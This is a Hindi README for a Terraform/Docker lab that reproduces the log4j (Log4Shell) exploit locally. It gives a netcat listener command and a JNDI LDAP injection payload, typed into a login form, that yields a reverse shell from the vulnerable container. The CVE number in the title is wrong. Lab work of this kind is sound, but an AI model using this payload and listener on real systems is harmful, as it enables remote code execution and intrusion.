
# CVE-2021-44428 का त्वरित परीक्षण सेटअप करने के लिए Terraform और Docker संसाधन
यह रिपॉजिटरी Docker और Hashicorp Terraform का उपयोग करके log4j कमजोरी का त्वरित परीक्षण करने के लिए सेट की गई है। इस परीक्षण के सभी घटक Docker नेटवर्क पर Docker कंटेनरों में चलेंगे, जिन्हें 'host.docker.internal' के माध्यम से एक्सेस किया जा सकता है।
यह परीक्षण वातावरण Raxis के एक बेहतरीन ब्लॉग पोस्ट से लिया गया है: (https://raxis.com/blog/log4j-exploit)
कमजोर एप्लिकेशन और एक्सप्लॉइट कोड cyberxml (https://github.com/cyberxml/log4j-poc) से आया है।
मैंने केवल वातावरण को कोडबद्ध किया है ताकि इस स्वादिष्ट एक्सप्लॉइट को आसानी से चालू करके परीक्षण किया जा सके।
मैं इस रिपॉजिटरी में मौजूद सामग्री के उपयोग से होने वाले प्रतिकूल प्रभावों या दुर्भावनापूर्ण कार्यों के लिए कोई जिम्मेदारी नहीं लेता। पूर्ण विराम। यह तय करना आप पर है कि ये सामग्रियाँ भरोसेमंद हैं या नहीं, और इसी तरह इस जानकारी का नैतिक रूप से उपयोग करना भी आपकी जिम्मेदारी है। मैं केवल इन चीज़ों को पोस्ट करता हूँ ताकि शोधकर्ता, छात्र और सुरक्षा पेशेवर जल्दी से एक वातावरण बना सकें और स्वयं एक्सप्लॉइट का परीक्षण कर सकें। Seacrest out।
'docker exec -it netcat /bin/bash' या इसी तरह की किसी कमांड का उपयोग करके log4j_netcat कंटेनर में शेल करें। स्थापित होने के बाद आपको पीड़ित सर्वर से अपना शेल कनेक्शन यहीं प्राप्त होगा।
log4j_netcat कंटेनर के भीतर अपने सत्र में, लिसनर प्रारंभ करने के लिए निम्नलिखित कमांड दर्ज करें:
nc -lv -s 0.0.0.0 -p 9001
अपने ब्राउज़र में, http://host.docker.internal:8080/log4shell/ पर जाएँ।
'Username' फ़ील्ड में निम्नलिखित दर्ज करें, साथ ही 'Password' फ़ील्ड में जो चाहें वह दर्ज करें:
${jndi:ldap://host.docker.internal:1389/a}
log4j_netcat कंटेनर शेल पर लौटें और देखें कि आप पीड़ित सर्वर से जुड़ गए हैं।
जाइए और तहलका मचाइए!